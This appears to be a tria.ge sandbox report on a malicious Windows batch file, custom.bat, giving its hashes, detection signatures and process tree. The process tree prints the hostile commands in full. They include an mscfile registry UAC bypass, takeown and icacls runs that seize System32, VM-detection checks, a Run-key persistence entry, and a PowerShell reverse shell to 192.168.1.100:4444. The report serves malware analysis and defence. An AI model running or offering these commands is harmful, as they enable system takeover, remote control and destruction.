Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
110s -
max time network
206s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
08/09/2024, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
custom.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
custom.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
custom.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
custom.bat
Resource
win11-20240802-en
General
-
Target
custom.bat
-
Size
4KB
-
MD5
1c63745d54962d205bb3ae879bea1ed4
-
SHA1
a832c894a4e2b6d486c48b9ea6ec79d94df9537e
-
SHA256
396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
-
SHA512
129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
-
SSDEEP
96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
pid Process 1344 takeown.exe 3972 takeown.exe 1296 icacls.exe 636 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 1296 icacls.exe 636 icacls.exe 1344 takeown.exe 3972 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" reg.exe -
pid Process 464 powershell.exe 3008 powershell.exe 1148 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 992 timeout.exe 3068 timeout.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 1400 systeminfo.exe 2548 systeminfo.exe 1836 systeminfo.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings cmd.exe Key deleted \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1148 powershell.exe 1148 powershell.exe 464 powershell.exe 464 powershell.exe 464 powershell.exe 3008 powershell.exe 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1148 powershell.exe Token: SeTakeOwnershipPrivilege 1344 takeown.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeTakeOwnershipPrivilege 3972 takeown.exe Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 4088 wrote to memory of 1084 4088 cmd.exe 84 PID 4088 wrote to memory of 1084 4088 cmd.exe 84 PID 4088 wrote to memory of 1148 4088 cmd.exe 85 PID 4088 wrote to memory of 1148 4088 cmd.exe 85 PID 4088 wrote to memory of 992 4088 cmd.exe 98 PID 4088 wrote to memory of 992 4088 cmd.exe 98 PID 4088 wrote to memory of 2660 4088 cmd.exe 99 PID 4088 wrote to memory of 2660 4088 cmd.exe 99 PID 4088 wrote to memory of 4872 4088 cmd.exe 100 PID 4088 wrote to memory of 4872 4088 cmd.exe 100 PID 4088 wrote to memory of 3068 4088 cmd.exe 103 PID 4088 wrote to memory of 3068 4088 cmd.exe 103 PID 4872 wrote to memory of 1344 4872 cmd.exe 104 PID 4872 wrote to memory of 1344 4872 cmd.exe 104 PID 4088 wrote to memory of 4508 4088 cmd.exe 106 PID 4088 wrote to memory of 4508 4088 cmd.exe 106 PID 4088 wrote to memory of 1400 4088 cmd.exe 107 PID 4088 wrote to memory of 1400 4088 cmd.exe 107 PID 4088 wrote to memory of 1664 4088 cmd.exe 108 PID 4088 wrote to memory of 1664 4088 cmd.exe 108 PID 4088 wrote to memory of 2548 4088 cmd.exe 111 PID 4088 wrote to memory of 2548 4088 cmd.exe 111 PID 4088 wrote to memory of 1128 4088 cmd.exe 112 PID 4088 wrote to memory of 1128 4088 cmd.exe 112 PID 4088 wrote to memory of 1836 4088 cmd.exe 113 PID 4088 wrote to memory of 1836 4088 cmd.exe 113 PID 4088 wrote to memory of 3820 4088 cmd.exe 114 PID 4088 wrote to memory of 3820 4088 cmd.exe 114 PID 4088 wrote to memory of 464 4088 cmd.exe 115 PID 4088 wrote to memory of 464 4088 cmd.exe 115 PID 4088 wrote to memory of 3508 4088 cmd.exe 116 PID 4088 wrote to memory of 3508 4088 cmd.exe 116 PID 4088 wrote to memory of 3972 4088 cmd.exe 117 PID 4088 wrote to memory of 3972 4088 cmd.exe 117 PID 4872 wrote to memory of 1296 4872 cmd.exe 118 PID 4872 wrote to memory of 1296 4872 cmd.exe 118 PID 4872 wrote to memory of 636 4872 cmd.exe 119 PID 4872 wrote to memory of 636 4872 cmd.exe 119 PID 4872 wrote to memory of 2360 4872 cmd.exe 120 PID 4872 wrote to memory of 2360 4872 cmd.exe 120 PID 4872 wrote to memory of 3008 4872 cmd.exe 121 PID 4872 wrote to memory of 3008 4872 cmd.exe 121
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\mode.commode con: cols=800 lines=602⤵PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f2⤵
- Modifies registry class
PID:2660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\* /grant Admin:F /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant Admin:F /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:636
-
-
C:\Windows\system32\mode.commode con: cols=800 lines=603⤵PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:3068
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Classes\mscfile" /f2⤵
- Modifies registry class
PID:4508
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:1400
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox"2⤵PID:1664
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2548
-
-
C:\Windows\system32\findstr.exefindstr /i "VMware"2⤵PID:1128
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:1836
-
-
C:\Windows\system32\findstr.exefindstr /i "Hyper-V"2⤵PID:3820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f2⤵
- Adds Run key to start application
PID:3508
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
948B
MD5310c4040e72365ea4993113fd77611ce
SHA13dbdc46110454c95ef61e3e88d0e8cb7f90ea5a6
SHA25611223ab7bdbe8d600e56b0d681f1c5109b7a8bd1bdf03a16975c8e77a8dd131f
SHA512deae0c82677b8202d26faa751eeeac868050745d3aedc1ac297d13d6b92ce434e8d5c620eb39b8f87647ba0b9a8f46b89a14b664f6f9a58c5c03834c5afc5bee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
285B
MD54577f08330df24a350ff523ec87bf38e
SHA15bd1a1b1b8ca3b007102a75f7abaf72348955cf2
SHA2565ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
SHA512ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2